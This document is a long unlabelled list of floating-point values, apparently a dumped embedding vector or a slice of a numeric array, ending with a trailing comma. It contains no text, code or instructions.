-0.004690760280936956, 0.005767613649368286, -0.015570814721286297, 0.010615197010338306, -0.014469566754996777, -0.008398761041462421, 0.0013190584722906351, -0.017689671367406845, -0.014030461199581623, 0.02067280001938343, 0.014399867504835129, -0.0461130291223526, -0.0026450869627296925, 0.02474323660135269, 0.014650784432888031, -0.009402429684996605, -0.001826120656915009, -0.027196651324629784, -0.0024098518770188093, 0.012971032410860062, -0.03986797481775284, 0.010134272277355194, -0.014358047395944595, -0.0028332748916000128, 0.010817324742674828, -0.004906828049570322, 0.014832002110779285, -0.0026485719718039036, -0.010162152349948883, -0.012448287568986416, 0.017104199156165123, -0.029245808720588684, -0.03892006725072861, 0.0010698835831135511, 0.024394741281867027, 0.0025962975341826677, 0.014288348145782948, -0.012629506178200245, -0.02348865009844303, 0.03183862194418907, 0.014316228218376637, 0.005743219051510096, -0.000048435540520586073, -0.02247104048728943, -0.004265594761818647, 0.0012815950904041529, 0.03214529901742935, -0.00427256477996707, -0.020505521446466446, -0.008538159541785717, -0.018121806904673576, -0.0184424240142107, 0.001164848916232586, 0.007652978878468275, -0.000005724324182665441, -0.020895838737487793, -0.013096490874886513, -0.004289989359676838, -0.014413806609809399, -0.0048928880132734776, -0.03334412723779678, 0.012817693874239922, 0.007443881127983332, -0.008586948737502098, 0.004851068370044231, 0.01993398740887642, 0.0018418029649183154, -0.024241402745246887, 0.008719377219676971, -0.02510567381978035, 0.004404993262141943, -0.007464790716767311, 0.0021571919787675142, 0.008245422504842281, 0.02902277186512947, -0.005311083514243364, 0.010008813813328743, -0.03058403544127941, -0.02969188429415226, 0.029608245939016342, -0.013884092681109905, 0.003864823840558529, -0.030556155368685722, -0.009074843488633633, -0.016490845009684563, -0.0019324119202792645, -0.014441686682403088, 0.0036417862866073847, -0.004453782923519611, -0.035797540098428726, -0.006011561024934053, 0.08475430309772491, 0.011855844408273697, -0.030137959867715836, -0.006217173766344786, -0.038390353322029114, -0.016867220401763916, -0.012099791318178177, -0.0057780686765909195, -0.011082182638347149, -0.011367949657142162, 0.0022791658993810415, 0.011890693567693233, 0.01593325100839138, -0.00046480694436468184, 0.022401342168450356, 0.003171316348016262, 0.016686003655195236, 0.021049177274107933, 0.01371681410819292, 0.005534121301025152, 0.006820072419941425, 0.020505521446466446, 0.0174248144030571, -0.023990485817193985, 0.00519956462085247, -0.011939482763409615, -0.02969188429415226, 0.003955433145165443, -0.0010785959893837571, -0.011472498066723347, -0.008775136433541775, -0.007917836308479309, -0.001478495541960001, 0.009409399703145027, -0.003955433145165443, -0.013201040215790272, 0.03696848824620247, 0.004293474368751049, -0.01801028847694397, -0.02648571878671646, -0.0019289270276203752, 0.0008886655559763312, 0.012713144533336163, 0.010782475583255291, -0.001392242731526494, -0.025398410856723785, 0.030193720012903214, 0.010524588637053967, -0.015027160756289959, 0.01160492654889822, -0.02284741774201393, -0.011772205121815205, -0.009367580525577068, 0.01803816854953766, -0.02149525098502636, 0.022666199132800102, 0.020017627626657486, 0.0031207844149321318, -0.003882248653098941, 0.007931775413453579, 0.010873084887862206, -0.010684896260499954, 0.0038752788677811623, -0.0037010307423770428, -0.0011056044604629278, -0.016030829399824142, -0.015361716970801353, 0.011577047407627106, -0.001993398880586028, 0.019306695088744164, 0.0011360979406163096, 0.015055039897561073, -0.015096860006451607, -0.015292017720639706, 0.018665460869669914, 0.04831552505493164, -0.012838603928685188, 0.03917098417878151, 0.004321353975683451, -0.028325779363512993, 0.017132077366113663, 0.013410137966275215, -0.02623480185866356, -0.0003397839027456939, 0.003106844611465931, -0.012030092068016529, 0.008796046487987041, -0.02636026032269001, 0.02351653017103672, -0.02051946148276329, 0.004363173618912697, -0.029859162867069244, 0.016337506473064423, -0.026889974251389503, 0.011932513676583767, 0.009228182025253773, 0.005457452032715082, -0.00854512955993414, -0.006746888160705566, 0.0031138143967837095, -0.005530636291950941, -0.013368317857384682, 0.0008690626709721982, 0.001109089469537139, -0.023906845599412918, 0.002643344458192587, 0.02051946148276329, 0.023614108562469482, -0.014211678877472878, -0.0007919578347355127, -0.01828908547759056, -0.013417107053101063, -0.004885917995125055, -0.05439330264925957, -0.010663987137377262, 0.004025132395327091, 0.006614459678530693, -0.011416738852858543, -0.002200754126533866, -0.019125476479530334, -0.017870889976620674, -0.021787988021969795, 0.027252409607172012, 0.023279553279280663, -0.0006211946601979434, -0.004443327896296978, -0.0014209937071427703, -0.0060150460340082645, 0.02036612294614315, -0.003068509977310896, 0.023586230352520943, 0.0023697747383266687, 0.0027304685208946466, -0.03261925280094147, 0.011402798816561699, -0.02905065193772316, 0.009228182025253773, -0.0038578540552407503, -0.02118857577443123, 0.025607507675886154, -0.025035973638296127, 0.0030824497807770967, -0.005795493256300688, 0.00039423644193448126, 0.01880485936999321, -0.009423339739441872, -0.02758696675300598, 0.005460937041789293, -0.001242389320395887, 0.018609702587127686, -0.006339147686958313, -0.02963612601161003, 0.03434779495000839, 0.03702424839138985, 0.0036731509026139975, -0.0034884479828178883, 0.021732229739427567, -0.029245808720588684, 0.012531926855444908, -0.009611528366804123, 0.007102354429662228, 0.0202406644821167, 0.026095403358340263, 0.01434410735964775, 0.004070436581969261, -0.007255692966282368, 0.017229657620191574, -0.009513949044048786, -0.020937656983733177, 0.0032113934867084026, 0.011381888762116432, 0.01629568636417389, -0.038055796176195145, 0.004791824147105217, 0.01621204800903797, 0.017717551440000534, -0.03758184239268303, 0.0021049175411462784, 0.012915273196995258, 0.01035034004598856, 0.005095015745609999, 0.022220123559236526, -0.005694429390132427, -0.00026420375797897577, 0.025621447712183, -0.015445356257259846, 0.012371618300676346, -0.023223793134093285, -0.03183862194418907, 0.03097435086965561, 0.004237715154886246, 0.05562001094222069, -0.008796046487987041, -0.03629937395453453, -0.011402798816561699, -0.05076894164085388, 0.002031733514741063, -0.0055062416940927505, -0.0024743236135691404, -0.013221949338912964, 0.00037768285255879164, 0.011751295067369938, 0.010691866278648376, -0.002484778640791774, -0.006844467483460903, -0.018888499587774277, 0.006398391909897327, 0.0007379408925771713, 0.001869682688266039, -0.010092453099787235, -0.003596481867134571, -0.023683808743953705, -0.028019102290272713, 0.045025721192359924, 0.012796783819794655, -0.02500809356570244, -0.0047674295492470264, -0.007416001055389643, -0.00480227917432785, 0.014183799736201763, -0.004875463433563709, 0.007841167040169239, 0.0009505236521363258, 0.012706175446510315, 0.020770380273461342, -0.007903896272182465, 0.017020558938384056, -0.01419076882302761, -0.00029339033062569797, 0.011890693567693233, 0.0029169139452278614, 0.0015124739147722721, 0.006468091160058975, 0.016002949327230453, 0.010914904065430164, 0.0041540758684277534, -0.023920785635709763, 0.006272933445870876, 0.039282504469156265, -0.02748938836157322, 0.005196079611778259, -0.02387896552681923, -0.0053145685233175755, 0.009660317562520504, 0.011556137353181839, -0.00012883472663816065, 0.007353271823376417, -0.0005462679546326399, -0.002556220395490527, -0.0011883723782375455, -0.013305588625371456, 0.0013739466667175293, 0.03002644143998623, -0.02054734155535698, 0.0038020946085453033, 0.0009418112458661199, -0.005084561184048653, 0.0004809248785022646, 0.019864289090037346, -0.023432891815900803, 0.019738830626010895, -0.026192981749773026, -0.02177404798567295, 0.02021278440952301, -0.023112274706363678, 0.010364280082285404, -0.016170227900147438, 0.011319159530103207, 0.025300830602645874, 0.0012990199029445648, -0.01936245523393154, 0.01636538654565811, 0.008106024004518986, -0.033316247165203094, -0.013075580820441246, -0.003180028637871146, 0.0013155735796317458, -0.018052108585834503, -0.010907934047281742, 0.006025501061230898, 0.007304482627660036, 0.037135764956474304, 0.017466634511947632, -0.026736635714769363, -0.03602057695388794, 0.023098334670066833, -0.005516696255654097, -0.011333099566400051, 0.01944609358906746, -0.01803816854953766, 0.0018470303621143103, 0.004422417841851711, -0.022708019241690636, -0.017870889976620674, -0.0025980398058891296, -0.003312457352876663, -0.028200320899486542, 0.026931794360280037, 0.021969206631183624, -0.05249748378992081, 0.005091530736535788, 0.022972876206040382, 0.025649327784776688, 0.0381673127412796, -0.0190836563706398, 0.03030523844063282, -0.00844058021903038, -0.010963693261146545, 0.0018644551746547222, 0.011570077389478683, -0.002655541757121682, -0.01644902490079403, 0.0011744325747713447, -0.0338180810213089, 0.012322829104959965, 0.011319159530103207, 0.021815868094563484, -0.0006390550988726318, 0.018079988658428192, -0.024757176637649536, -0.0034884479828178883, -0.006931591313332319, -0.005994136445224285, -0.028423357754945755, 0.006227628793567419, 0.004363173618912697, 0.012427378445863724, 0.014072280377149582, -0.017619973048567772, -0.006332177668809891, 0.021049177274107933, 0.036438774317502975, -0.0026834215968847275, 0.011542197316884995, 0.018330905586481094, -0.007666918449103832, -0.0006695485208183527, 0.003979827743023634, 0.009353640489280224, -0.0042795343324542046, -0.002247801050543785, -0.008496339432895184, -0.01757815293967724, 0.0008311636629514396, 0.005621245130896568, 0.01990610919892788, -0.008837865665555, -0.020045507699251175, -0.018581822514533997, 0.003206165973097086, -0.01027367077767849, 0.0249802153557539, -0.02513355389237404, 0.011465528048574924, 0.011228551156818867, 0.031754981726408005, 0.0045060571283102036, -0.011542197316884995, 0.016644183546304703, -0.04416145011782646, -0.0029674458783119917, 0.005366843193769455, -0.0037637599743902683, -0.005265778861939907, -0.013291648589074612, -0.002784485463052988, -0.002686906373128295, -0.004241200163960457, -0.017480574548244476, -0.014016521163284779, -0.0023366676177829504, -0.0030371451284736395, -0.027503328397870064, -0.0004674206720665097, 0.030082199722528458, 0.004589696414768696, 0.02648571878671646, 0.0004221161361783743, -0.00497652729973197, -0.005095015745609999, 0.014553205110132694, 0.023293493315577507, 0.02544022910296917, -0.015849610790610313, -0.004488632548600435, -0.000048381087253801525, -0.022038906812667847, 0.025788726285099983, -0.0030232053250074387, -0.005837312899529934, 0.01032245997339487, 0.0034135212190449238, 0.014859882183372974, 0.011939482763409615, 0.006265963427722454, -0.0005066265002824366, 0.007046595215797424, 0.007590249180793762, -0.02410200424492359, -0.018972137942910194, 0.008391791023314, 0.012775874696671963, -0.005063651129603386, 0.012894363142549992, 0.03214529901742935, -0.002915171440690756, -0.0011134457308799028, -0.011577047407627106, -0.0006564799114130437, -0.0007854235591366887, -0.0040425569750368595, 0.008579978719353676, -0.00897726509720087, -0.017313295975327492, -0.02971976436674595, -0.022178305312991142, -0.006684158928692341, -0.0055515458807349205, -0.02097947709262371, 0.011639776639640331, -0.02097947709262371, -0.01073368638753891, -0.029245808720588684, -0.029580365866422653, -0.004941677674651146, 0.0020125661976635456, 0.025022033601999283, -0.01828908547759056, 0.002054385608062148, 0.032702893018722534, 0.015793852508068085, 0.02669481560587883, 0.011695535853505135, 0.00045391643652692437, -0.0008268074598163366, -0.006091715302318335, -0.011082182638347149, 0.008531189523637295, -0.004112256225198507, 0.016811462119221687, -0.012984972447156906, -0.005847767926752567, -0.019501853734254837, 0.011960392817854881, 0.0008159169810824096, -0.003185256151482463, 0.013723784126341343, 0.00237325974740088, 0.006464606150984764, -0.01801028847694397, 0.014427746646106243, 0.025816606357693672, -0.01605870947241783, 0.05018346756696701, -0.014497445896267891, 0.0037428501527756453, 0.007158114109188318, 0.0056665497832000256, -0.017327236011624336, -0.0023924270644783974, 0.028576696291565895, 0.0015621347120031714, 0.007395091466605663, -0.013891062699258327, 0.03351140394806862, 0.006248538848012686, -0.013493776321411133, -0.013981671072542667, 0.0054400269873440266, -0.03334412723779678, 0.006272933445870876, 0.017592092975974083, 0.0005005277926102281, -0.012608596123754978, 0.0070605347864329815, -0.02761484682559967, -0.0018400604603812099, -0.03373444080352783, -0.0007906509563326836, -0.004621061030775309, 0.014253498986363411, -0.00668067391961813, 0.008433610200881958, -0.009750926867127419, -0.011904633603990078, 0.01803816854953766, 0.03320472687482834, 0.016713881865143776, -0.010183061473071575, -0.001616151537746191, -0.006028986070305109, 0.010517618618905544, 0.011542197316884995, 0.014302288182079792, -0.020561281591653824, 0.024659598246216774, 0.0008520734263584018, 0.04474692419171333, 0.009346670471131802, -0.005757158622145653, -0.013877122662961483, 0.017592092975974083, 0.0112076411023736, -0.004241200163960457, 0.010364280082285404, -0.012671325355768204, -0.01798240840435028, -0.015612633898854256, 0.007506610359996557, 0.006447181571274996, -0.00773661769926548, -0.011953422799706459, 0.008126934058964252, -0.013661054894328117, 0.018637582659721375, -0.0063147530891001225, -0.014288348145782948, -0.007701768074184656, -0.026109343394637108, -0.0071372040547430515, -0.003511100308969617, -0.0032985175494104624, 0.010587317869067192, -0.010531557723879814, 0.020129146054387093, -0.009653347544372082, -0.0035686020273715258, 0.020129146054387093, -0.014169859699904919, -0.007757527753710747, 0.009827595204114914, 0.0020387033000588417, -0.00733933225274086, 0.0020561281125992537, -0.008377850987017155, 0.005408662371337414, 0.0027827429585158825, -0.015055039897561073, 0.005743219051510096, 0.009806686080992222, 0.0019132447196170688, -0.02507779374718666, 0.009486068971455097, -0.009311821311712265, -0.006820072419941425, 0.008579978719353676, 0.006265963427722454, -0.021997086703777313, -0.00018459412967786193, 0.014016521163284779, -0.003871793858706951, -0.003885733662173152, -0.007036140188574791, -0.009778806008398533, 0.0008551228092983365, -0.0013870152179151773, 0.012587686069309711, 0.012524956837296486, -0.010594287887215614, -0.018066048622131348, 0.0001629220205359161, 0.03593693673610687, 0.017466634511947632, -0.004941677674651146, 0.01082429476082325, -0.0010968920541927218, 0.006422786973416805, 0.01058034785091877, 0.002819335088133812, 0.00019853399135172367, -0.017146017402410507, -0.0162678062915802, -0.007799346931278706, -0.01168159581720829, -0.025830546393990517, 0.013354377821087837, 0.004885917995125055, 0.0003336851950734854, 0.005265778861939907, 0.004262109752744436, 0.00046175759052857757, 0.00007797604484949261, -0.014044401235878468, -0.004781369119882584, -0.028353659436106682, -0.006168384570628405, -0.004917282611131668, 0.0044677224941551685, -0.031754981726408005, 0.006143989972770214, 0.019738830626010895, 0.01798240840435028, -0.007882986217737198, 0.015096860006451607, -0.025607507675886154, -0.028548816218972206, 0.004645455628633499, -0.00929788127541542, -0.008112994022667408, 0.019641252234578133, -0.01755027286708355, 0.0071372040547430515, -0.006774768233299255, 0.0025649326853454113, -0.0015717182541266084, 0.03312108665704727, 0.028451237827539444, 0.01354953646659851, 0.008879685774445534, 0.005924437195062637, -0.000954008603002876, -0.017717551440000534, 0.004865008406341076, 0.020993417128920555, 0.007827227003872395, -0.004913797602057457, 0.011103091761469841, 0.023892905563116074, -0.00005826422420796007, -0.030834952369332314, 0.017285415902733803, 0.004568786360323429, -0.010677926242351532, 0.0010289353085681796, 0.0195994321256876, 0.015640513971447945, 0.014260468073189259, -0.012016152031719685, 0.02039400301873684, -0.008963325060904026, 0.004283019341528416, -0.0003476250567473471, -0.02516143210232258, -0.010183061473071575, -0.0017747173551470041, 0.03671757131814957, -0.005760643631219864, 0.0021781018003821373, -0.005185625050216913, -0.024422621354460716, -0.00023567062453366816, -0.02146737277507782, -0.002737438539043069, 0.004063467029482126, -0.004377113655209541, -0.008252392522990704, 0.009869415313005447, 0.02467353828251362, 0.004697730299085379, 0.009332730434834957, -0.0033455644734203815, -0.004945162683725357, 0.004000737331807613, -0.011354009620845318, -0.008768166415393353, -0.036132097244262695, 0.007541459985077381, 0.005980196408927441, 0.022512860596179962, -0.004513027146458626, -0.008475430309772491, 0.011883723549544811, 0.02443655952811241, -0.00607777526602149, 0.010935814119875431, 0.020617041736841202, -0.004938192665576935, 0.021174635738134384, -0.0024203069042414427, 0.018205447122454643, 0.0038439142517745495, 0.02174616977572441, -0.003816034412011504, 0.003903158474713564, 0.006258993409574032, -0.008872715756297112, -0.00040251322207041085, -0.008956355042755604, -0.028019102290272713, -0.006847952492535114, -0.013681964948773384, -0.004087861627340317, -0.01467866450548172, -0.010113362222909927, -0.005851252935826778, -0.026764515787363052, 0.018024228513240814, -0.014859882183372974, 0.02464565820991993, -0.009980933740735054, -0.004910313058644533, -0.007255692966282368, -0.0013390970416367054, 0.005837312899529934, -0.0011535227531567216, -0.02592812478542328, -0.006942046340554953, 0.007611159235239029, 0.0007061406504362822, 0.012915273196995258, -0.015389596112072468, -0.03339988365769386, -0.00914454273879528, 0.006544760428369045, 0.0052797188982367516, 0.0015656196046620607, 0.00901908427476883, -0.01531989686191082, -0.016783582046628, -0.016825402155518532, -0.0018296055495738983, 0.006189294159412384, -0.005934891756623983, -0.0128107238560915, 0.0044677224941551685, 0.036773327738046646, -0.012357679195702076, 0.007478730753064156, 0.005474877078086138, 0.005683974828571081, -0.032702893018722534, 0.006677188910543919, -0.002913429168984294, -0.031476184725761414, -0.011040362529456615, 0.002324470318853855, 0.01074762549251318, -0.02182980813086033, 0.014915641397237778, 0.0014941778499633074, 0.049374956637620926, 0.00039576110430061817, 0.02118857577443123, 0.006346117705106735, -0.000022788390197092667, -0.020170966163277626, 0.0013077323092147708, -0.012636476196348667, -0.008949385024607182, -0.008266332559287548, 0.029496727511286736, -0.0058164033107459545, -0.028660334646701813, -0.004959102254360914, 0.0023506074212491512, -0.0007248722831718624, -0.01226009987294674, 0.010587317869067192, -0.003816034412011504, 0.00500092189759016, -0.0003707129508256912, -0.003080707276239991, 0.026192981749773026, 0.007687828503549099, 0.004917282611131668, -0.008022384718060493, 0.0016658123349770904, 0.013905002735555172, 0.02825607918202877, 0.016588423401117325, 0.027559086680412292, -0.004673335235565901, -0.0075623695738613605, 0.008140873163938522, 0.0046175760217010975, 0.028005162253975868, 0.022819537669420242, -0.007520549930632114, -0.01414197962731123, -0.0029378237668424845, 0.018972137942910194, 0.012747994624078274, 0.013626204803586006, -0.0039589181542396545, -0.006060350686311722, 0.012664355337619781, 0.026095403358340263, -0.0007340203155763447, -0.018888499587774277, 0.0007893441361375153, 0.009304851293563843, -0.005143805406987667, -0.004993951879441738, -0.009026054292917252, 0.0050810761749744415, 0.011639776639640331, -0.0012371618067845702, 0.00008167882333509624, 0.014929581433534622, -0.024701418355107307, -0.010963693261146545, -0.025482049211859703, -0.0023837147746235132, 0.0026381169445812702, 0.013417107053101063, -0.010015783831477165, -0.003347306977957487, 0.01663024351000786, -0.005359873175621033, 0.002186814323067665, -0.0033107148483395576, -0.012608596123754978, -0.014511385932564735, -0.009109693579375744, 0.01721571758389473, 0.007116294465959072, 0.010796415619552135, -0.01284557394683361, 0.0163932666182518, -0.026527538895606995, -0.009088783524930477, -0.0009662059601396322, -0.023823207244277, 0.005304113496094942, -0.008433610200881958, -0.0022268914617598057, -0.012009182013571262, 0.005555030889809132, 0.02648571878671646, 0.006238083820790052, 0.019989747554063797, 0.01032245997339487, 0.03535146266222, -0.024422621354460716, -0.007583279628306627, -0.010524588637053967, 0.0021815868094563484, -0.0009723046678118408, -0.0024046243634074926, -0.013033761642873287, -0.005105470772832632, -0.011068242602050304, -0.015110799111425877, -0.02602570317685604, -0.02871609479188919, -0.0016797521384432912, 0.005907012149691582, -0.010921874083578587, -0.015041099861264229, 0.019348515197634697, 0.0030789647717028856, -0.009026054292917252, 0.0022146939300000668, 0.02070068009197712, 0.00922121200710535, 0.007715708110481501, -0.004690760280936956, -0.002897746628150344, -0.011597956530749798, -0.007611159235239029, -0.0019620342645794153, -0.013152250088751316, 0.015055039897561073, -0.013159220106899738, 0.03387384116649628, 0.014288348145782948, 0.0033629892859607935, -0.02449231967329979, -0.028214260935783386, -0.007478730753064156, 0.00660400465130806, -0.0030022955033928156, 0.025732966139912605, -0.007680858485400677, -0.01186281442642212, -0.01859576255083084, -0.028939133509993553, 0.02064491994678974, 0.0005937505629844964, -0.0017381253419443965, -0.015389596112072468, 0.002300075488165021, 0.011946452781558037, -0.0015673621091991663, 0.006022016052156687, -0.023195913061499596, -0.02538447082042694, -0.0008089470211416483, -0.017759371548891068, -0.010726716369390488, -0.0022983329836279154, -0.005614275578409433, -0.012099791318178177, -0.0011570077622309327, 0.00454787677153945, -0.000515774532686919, -0.01596113108098507, 0.008343001827597618, -0.010601256974041462, -0.0009513949044048786, 0.017118137329816818, 0.012552836909890175, -0.006656279321759939, 0.024060184136033058, 0.012483137659728527, 0.026109343394637108, -0.012545866891741753, -0.011298250406980515, 0.0038961886893957853, 0.01547323539853096, 0.007422971073538065, 0.0026973614003509283, -0.011388858780264854, -0.0023662899620831013, 0.006872347090393305, 0.009102723561227322, -0.0015882719308137894, -0.012441317550837994, -0.007457820698618889, 0.002324470318853855, 0.014093190431594849, 0.02046370320022106, -0.008768166415393353, -0.008322091773152351, 0.02070068009197712, 0.0004774399276357144, -0.0089005958288908, -0.027656666934490204, -0.0033159423619508743, 0.0003567730891518295, 0.010719746351242065, 0.017536332830786705, 0.004129681270569563, 0.027015432715415955, -0.009381520561873913, -0.009862445294857025, -0.017146017402410507, 0.002341895131394267, 0.01137491874396801, 0.0060498956590890884, -0.004404993262141943, 0.006311268080025911, 0.007862076163291931, 0.015765972435474396, -0.042767465114593506, 0.004283019341528416, -0.014497445896267891, -0.0192091166973114, -0.01957155205309391, -0.0050044069066643715, 0.0008442322723567486, -0.009834565222263336, 0.0003598224138841033, -0.018093928694725037, -0.0009487811475992203, 0.02877185493707657, 0.010413069278001785, 0.018233327195048332, 0.005840797908604145, 0.014232588931918144, -0.008524219505488873, 0.015041099861264229, -0.015682334080338478, -0.003150406526401639, 0.00013057720207143575, -0.01143764890730381, -0.000709189975168556, -0.011563107371330261, 0.028660334646701813, -0.019989747554063797, -0.0030144930351525545, 0.005300628487020731, 0.004439842887222767, 0.015138679184019566, 0.022150425240397453, -0.014887762255966663, -0.014302288182079792, 0.0022251489572227, -0.010970663279294968, -0.006346117705106735, -0.018916379660367966, -0.007903896272182465, -0.025189312174916267, -0.008754227310419083, 0.009109693579375744, 0.01801028847694397, -0.003899673465639353, 0.002467353828251362, 0.009005144238471985, -0.0038578540552407503, 0.016560543328523636, 0.002646829467266798, -0.02113281562924385, -0.002131054876372218, -0.005499271675944328, -0.0001441903441445902, -0.021857688203454018, 0.0007375052664428949, 0.015570814721286297, -0.0040042223408818245, 0.003340336959809065, -0.029580365866422653, 0.028088802471756935, 0.026778455823659897, 0.0005149032804183662, -0.00914454273879528, 0.006969925947487354, -0.014887762255966663, 0.011416738852858543, -0.009081813506782055, -0.032675012946128845, -0.005300628487020731, -0.009890325367450714, 0.0011465528514236212, 0.002256513573229313, -0.003648756304755807, -0.013138310052454472, -0.01249010767787695, -0.033622924238443375, -0.0059383767656981945, -0.02192738652229309, 0.02905065193772316, -0.007422971073538065, 0.004865008406341076, 0.004837128799408674, 0.014316228218376637, -0.019320635125041008, 0.011263400316238403, -0.005865192506462336, -0.0162678062915802, -0.000844667898491025, -0.00045957948896102607, 0.014016521163284779, -0.004589696414768696, -0.01816362701356411, -0.010866114869713783, 0.0031782861333340406, -0.036215733736753464, -0.007457820698618889, 0.015710212290287018, 0.01969701051712036, -0.0022024966310709715, 0.01905577816069126, -0.00613004993647337, 0.0020979477558285, -0.014539266005158424, 0.006178839597851038, 0.00427256477996707, 0.006924621295183897, 0.010489738546311855, -0.0011334841838106513, 0.010057603009045124, -0.023837147280573845, 0.010921874083578587, -0.0036975457333028316, -0.008761197328567505, 0.002556220395490527, 0.0035058727953583, -0.006767798215150833, 0.02339107170701027, -0.0076738884672522545, -0.005356388166546822, -0.029190050438046455, -0.016978738829493523, -0.008524219505488873, -0.01531989686191082, -0.010663987137377262, 0.009423339739441872, -0.013417107053101063, -0.00342920352704823, -0.019153356552124023, 0.011744325049221516, 0.018177567049860954, 0.0017294129356741905, 0.0162678062915802, 0.001671910984441638, -0.029440967366099358, 0.007666918449103832, -0.020784318447113037, 0.003955433145165443, 0.017815131694078445, 0.035490863025188446, -0.02684815414249897, 0.007039625197649002, 0.01969701051712036, -0.009193331934511662, 0.019585492089390755, -0.024562019854784012, 0.018860619515180588, -0.014121069572865963, -0.017815131694078445, -0.005321538541465998, 0.01865152269601822, 0.019348515197634697, 0.024785056710243225, 0.0068235574290156364, 0.008816956542432308, 0.008329061791300774, 0.02162070944905281, -0.00011641954188235104, -0.012573746033012867, 0.014650784432888031, 0.004028617404401302, 0.012357679195702076, 0.008698467165231705, -0.010998543351888657, -0.009562738239765167, 0.019989747554063797, 0.009158482775092125, -0.00043300664401613176, 0.006969925947487354, 0.0029082016553729773, 0.024060184136033058, 0.019529731944203377, 0.019710950553417206, 0.017787251621484756, -0.023223793134093285, 0.02336319163441658, 0.00615444453433156, -0.00003335218571010046, -0.01867940090596676, 0.009207271970808506, -0.006262478418648243, -0.004774399101734161, -0.01801028847694397, 0.008022384718060493, 0.004129681270569563, -0.01944609358906746, -0.005283203907310963, 0.00781328696757555, -0.0056038205511868, 0.00244992901571095, 0.020895838737487793, -0.0001608528255019337, -0.03501690924167633, -0.00043366008321754634, 0.007701768074184656, -0.001103862072341144, 0.040230412036180496, -0.011033392511308193, 0.013849242590367794, 0.0034710231702774763, 0.001692820806056261, 0.01847030408680439, -0.0034483708441257477, 0.008036324754357338, -0.0012693977914750576, -0.00009126246732193977, -0.011549167335033417, -0.02553780935704708, -0.008092083968222141, -0.024088064208626747, -0.026095403358340263, -0.010454889386892319, 0.010064573027193546, -0.023098334670066833, 0.029217930510640144, -0.014051370322704315, 0.004161045886576176, -0.009987903758883476, -0.01113097183406353, 0.00668067391961813, 0.004718639887869358, -0.015250197611749172, 0.016783582046628, 0.005398207809776068, 0.014943521469831467, 0.010984603315591812, 0.012922242283821106, -0.006161414552479982, 0.015278077684342861, -0.007008260581642389, 0.03245197609066963, -0.0019236995140090585, -0.009520919062197208, -0.01834484562277794, 0.015333836898207664, -0.0034867054782807827, 0.0018714250763878226, -0.000014484377061307896, -0.004628031048923731, -0.027349989861249924, 0.008559068664908409, 0.05715339258313179, -0.008733317255973816, 0.022164365276694298, -0.01230888906866312, -0.005607305560261011, -0.01547323539853096, -0.01577991247177124, 0.009388490580022335, -0.009632437489926815, -0.011542197316884995, -0.013131340965628624, 0.006715523544698954, 0.005290173925459385, 0.010782475583255291, -0.020268544554710388, -0.0009174165315926075, 0.012030092068016529, -0.0272802896797657, -0.008398761041462421, -0.0015403536381199956, 0.01598900929093361, 0.0074020614847540855, -0.015556874684989452, 0.006168384570628405, -0.021843748167157173, 0.027879703789949417, -0.0012362906709313393, -0.007534489966928959, 0.019223056733608246, 0.005108955781906843, -0.0070117455907166, 0.005631700158119202, 0.00437362864613533, 0.0015203150687739253, -0.007112809456884861, 0.0025422805920243263, -0.009750926867127419, 0.013054671697318554, 0.0052797188982367516, -0.027349989861249924, 0.013493776321411133, -0.006562185473740101, -0.008984234184026718, -0.009039994329214096, 0.003004038007929921, 0.00932576134800911, -0.0017477088840678334, -0.015501115471124649, -0.01452532596886158, 0.003437916049733758, 0.008140873163938522, -0.0017764598596841097, -0.015027160756289959, -0.011472498066723347, -0.022220123559236526, 0.02333531156182289, 0.012134641408920288, -0.012929212301969528, -0.022526800632476807, 0.0005257938173599541, 0.0033560192678123713, 0.011814024299383163, 0.007799346931278706, -0.00020071209291927516, -0.002561447909101844, -0.007116294465959072, 0.019097596406936646, 0.008405731059610844, -0.011110061779618263, 0.0162678062915802, 0.010022753849625587, 0.00878907646983862, 0.014058340340852737, -0.019669130444526672, 0.0006987350643612444, -0.0008485884754918516, 0.010893994010984898, -0.0028733520302921534, -0.001103862072341144, -0.010489738546311855, -0.014539266005158424, 0.0070884148590266705, 0.0018313480541110039, 0.0026276621501892805, 0.0202406644821167, 0.00003136466693831608, -0.0039658877067267895, 0.008649677969515324, 0.002458641305565834, -0.01238555833697319, -0.01767573133111, 0.004377113655209541, 0.0032166207674890757, 0.011165820993483067, -0.002291363198310137, 0.01813574694097042, 0.008092083968222141, 0.01862364262342453, 0.0011683338088914752, 0.019683070480823517, -0.0072487229481339455, 0.03214529901742935, 0.0003221412771381438, 0.015724152326583862, 0.01348680630326271, -0.011395828798413277, -0.003441401058807969, 0.009123632684350014, -0.008336031809449196, -0.021355852484703064, -0.0029378237668424845, -0.018665460869669914, -0.014608965255320072, 0.027503328397870064, -0.015891430899500847, -0.0020212784875184298, 0.020435823127627373, 0.014114100486040115, -0.00301623553968966, 0.027656666934490204, 0.0007745330221951008, -0.004059982020407915, 0.006356572266668081, 0.0076738884672522545, 0.007827227003872395, 0.015013220719993114, -0.004600150976330042, -0.009632437489926815, 0.00018557427392806858, 0.012051002122461796, -0.011005513370037079, 0.008851805701851845, -0.0064750611782073975, -0.006645824294537306, 0.016783582046628, -0.0045792413875460625, 0.01657448336482048, -0.006509910803288221, 0.028548816218972206, -0.008691498078405857, -0.020282484591007233, 0.01074762549251318, -0.005952316801995039, 0.0061648995615541935, 0.005262294318526983, 0.017564212903380394, -0.0202406644821167, 0.018790921196341515, -0.017536332830786705, -0.002549250377342105, -0.008245422504842281, 0.016156287863850594, 0.02464565820991993, 0.0192091166973114, -0.01058034785091877, -0.021885568276047707, 0.0017895285272970796, 0.003704515751451254, 0.006356572266668081, -0.005805948283523321, 0.001418379950337112, 0.0044189328327775, 0.005227444693446159, 0.01939033344388008, -0.008189663290977478, -0.005823373328894377, 0.0027949402574449778, -0.009632437489926815, -0.015919310972094536, -0.007443881127983332, 0.0005314568406902254, -0.007792377378791571, -0.004711669869720936, 0.008336031809449196, 0.011946452781558037, -0.008830896578729153, 0.021997086703777313, -0.021174635738134384, -0.01614234782755375, 0.0024690963327884674, -0.01990610919892788, 0.0095418281853199, 0.00844058021903038, 0.009186362847685814, -0.01304073166102171, 0.014385927468538284, -0.017132077366113663, 0.005969741381704807, 0.006562185473740101, -0.004321353975683451, -0.0020055961795151234, 0.02213648520410061, -0.007618129253387451, -0.023293493315577507, 0.007527519948780537, 0.0021467371843755245, 0.005297143943607807, 0.02559356763958931, -0.012030092068016529, -0.006171869579702616, -0.011995242908596992, 0.0032688952051103115, 0.0192091166973114, -0.02097947709262371, -0.00040316666127182543, -0.001056815031915903, 0.0008686270448379219, 0.009165452793240547, 0.02318197302520275, -0.026597237214446068, 